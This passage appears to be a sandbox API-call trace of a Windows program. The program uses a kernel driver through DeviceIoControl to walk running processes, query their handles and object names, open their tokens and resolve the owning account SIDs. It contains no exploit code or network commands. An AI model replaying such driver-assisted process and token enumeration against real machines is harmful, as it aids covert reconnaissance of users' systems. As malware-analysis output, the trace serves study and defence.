(HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.269] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.269] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.269] PsAcquireProcessExitSynchronization () returned 0x0 [0246.270] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880053c85d0) [0246.270] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.270] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.270] PsReleaseProcessExitSynchronization () returned 0x2 [0246.270] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0246.270] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.270] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.270] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.270] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x914) returned 0xc8 [0246.270] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.270] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020c8b30, HandleInformation=0x0) returned 0x0 [0246.270] ObOpenObjectByPointer (in: Object=0xfffffa80020c8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.270] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x14 [0246.270] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.270] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.270] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.270] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.271] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.272] CloseHandle (hObject=0xc4) returned 1 [0246.273] CloseHandle (hObject=0xc8) returned 1 [0246.273] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.273] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.273] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.273] PsAcquireProcessExitSynchronization () returned 0x0 [0246.273] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880053c85d0) [0246.273] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020bdf20, HandleInformation=0x0) returned 0x0 [0246.273] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.273] PsReleaseProcessExitSynchronization () returned 0x2 [0246.273] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0246.273] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.273] ObfDereferenceObject (Object=0xfffffa80020bdf20) returned 0x1 [0246.273] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.273] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.273] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.273] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0246.273] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.273] PsAcquireProcessExitSynchronization () returned 0x0 [0246.273] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880053c85d0) [0246.273] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020c8070, HandleInformation=0x0) returned 0x0 [0246.274] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.274] PsReleaseProcessExitSynchronization () returned 0x2 [0246.274] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0246.274] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.274] ObfDereferenceObject (Object=0xfffffa80020c8070) returned 0x1 [0246.274] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.274] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.274] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.274] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.274] PsLookupProcessByProcessId (in: ProcessId=0x914, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.274] PsAcquireProcessExitSynchronization () returned 0x0 [0246.274] KeStackAttachProcess (in: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020c8b30, ApcState=0xfffff880053c85d0) [0246.274] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.274] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.274] PsReleaseProcessExitSynchronization () returned 0x2 [0246.274] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0246.274] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.274] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.274] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.274] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xc8 [0246.274] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.275] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020d37a0, HandleInformation=0x0) returned 0x0 [0246.275] ObOpenObjectByPointer (in: Object=0xfffffa80020d37a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.275] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x14 [0246.275] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.275] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.275] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.297] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.297] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.299] CloseHandle (hObject=0xc4) returned 1 [0246.299] CloseHandle (hObject=0xc8) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.299] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.299] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.299] PsAcquireProcessExitSynchronization () returned 0x0 [0246.299] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880053c85d0) [0246.299] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020b0340, HandleInformation=0x0) returned 0x0 [0246.299] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.299] PsReleaseProcessExitSynchronization () returned 0x2 [0246.299] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0246.299] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.299] ObfDereferenceObject (Object=0xfffffa80020b0340) returned 0x1 [0246.299] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.299] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.300] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0246.300] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.300] PsAcquireProcessExitSynchronization () returned 0x0 [0246.300] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880053c85d0) [0246.300] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020debe0, HandleInformation=0x0) returned 0x0 [0246.300] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.300] PsReleaseProcessExitSynchronization () returned 0x2 [0246.300] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0246.300] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.300] ObfDereferenceObject (Object=0xfffffa80020debe0) returned 0x1 [0246.300] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.300] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.300] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.300] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.300] PsAcquireProcessExitSynchronization () returned 0x0 [0246.300] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880053c85d0) [0246.300] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.300] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.300] PsReleaseProcessExitSynchronization () returned 0x2 [0246.300] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0246.300] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.300] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.300] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.301] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x934) returned 0xc8 [0246.301] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.301] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020d7b30, HandleInformation=0x0) returned 0x0 [0246.301] ObOpenObjectByPointer (in: Object=0xfffffa80020d7b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.301] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x14 [0246.301] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.301] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.301] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.301] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.301] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.303] CloseHandle (hObject=0xc4) returned 1 [0246.303] CloseHandle (hObject=0xc8) returned 1 [0246.303] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.303] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.303] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.303] PsAcquireProcessExitSynchronization () returned 0x0 [0246.303] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880053c85d0) [0246.303] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020e84a0, HandleInformation=0x0) returned 0x0 [0246.303] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.303] PsReleaseProcessExitSynchronization () returned 0x2 [0246.303] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0246.303] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.303] ObfDereferenceObject (Object=0xfffffa80020e84a0) returned 0x1 [0246.303] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.304] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.304] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.304] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0246.304] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.304] PsAcquireProcessExitSynchronization () returned 0x0 [0246.304] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880053c85d0) [0246.304] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020e8070, HandleInformation=0x0) returned 0x0 [0246.304] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.304] PsReleaseProcessExitSynchronization () returned 0x2 [0246.304] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0246.304] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.304] ObfDereferenceObject (Object=0xfffffa80020e8070) returned 0x1 [0246.304] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.304] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.304] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.304] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.304] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.304] PsAcquireProcessExitSynchronization () returned 0x0 [0246.304] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880053c85d0) [0246.304] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.305] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.305] PsReleaseProcessExitSynchronization () returned 0x2 [0246.305] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0246.305] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.305] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.305] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.305] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x944) returned 0xc8 [0246.305] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.305] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020fc740, HandleInformation=0x0) returned 0x0 [0246.305] ObOpenObjectByPointer (in: Object=0xfffffa80020fc740, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.305] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x14 [0246.305] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.305] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.305] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.305] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.305] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.307] CloseHandle (hObject=0xc4) returned 1 [0246.307] CloseHandle (hObject=0xc8) returned 1 [0246.307] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.307] DeviceIoControl (in: hDevice=0x7c, 